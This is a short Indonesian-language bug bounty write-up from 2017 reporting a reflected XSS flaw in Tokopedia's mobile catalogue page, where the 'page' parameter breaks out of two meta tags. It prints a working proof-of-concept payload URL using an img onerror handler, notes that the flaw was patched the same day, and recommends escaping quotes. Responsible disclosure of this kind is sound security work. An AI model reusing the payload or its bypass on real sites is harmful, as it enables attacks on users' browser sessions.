Another Tokopedia XSS via Meta Header

Dimaz Arno
1 min readJul 14, 2017

--

TLDR : m.tokopedia.com terdapat celah keamanan XSS pada meta header, tim Tokopedia melakukan patching di hari yang sama setelah report. Good Work!

URL : https://m.tokopedia.com/catalog/50985/oppo-a39?page=4&tab=gallery&utm_expid=87907915-89.sPf29QnwTF-igeChqJKVQA.0

Parameter : page

Keterangan :

Nilai dari parameter page ditulis ulang (reflective) dibeberapa tempat seperti :

1.  <meta name="title" content="Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4" />2.  <meta property="og:title" content="Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4"/>3.  <title>Galeri Oppo A39 | Tokopedia, Halaman , Halaman 4</title>

Dari hasil riset tags yang tidak terkena escape quote adalah tag nomor 1 dan 2. Masih dengan kurang lebih teknik bypass yang sama dengan report yang sebelumnya, akhirnya didapat payload seperti berikut :

https://m.tokopedia.com/catalog/50985/oppo-a39?page=4"><a<img src=”https://ethic.ninja" onerror>=prompt(document.domain)>&tab=gallery&utm_expid=87907915–89.sPf29QnwTF-igeChqJKVQA.0

XSS

Rekomendasi :

Perlu ditambahkan fungsi escape quote atau menggunakan metode white list karakter yang diperbolehkan.

Bounty :

Bounty Reward + Certificate

--

--

Dimaz Arno
Dimaz Arno

Written by Dimaz Arno

IT Security Enthusiast, CEO of Ethic Ninja https://ethic.ninja

No responses yet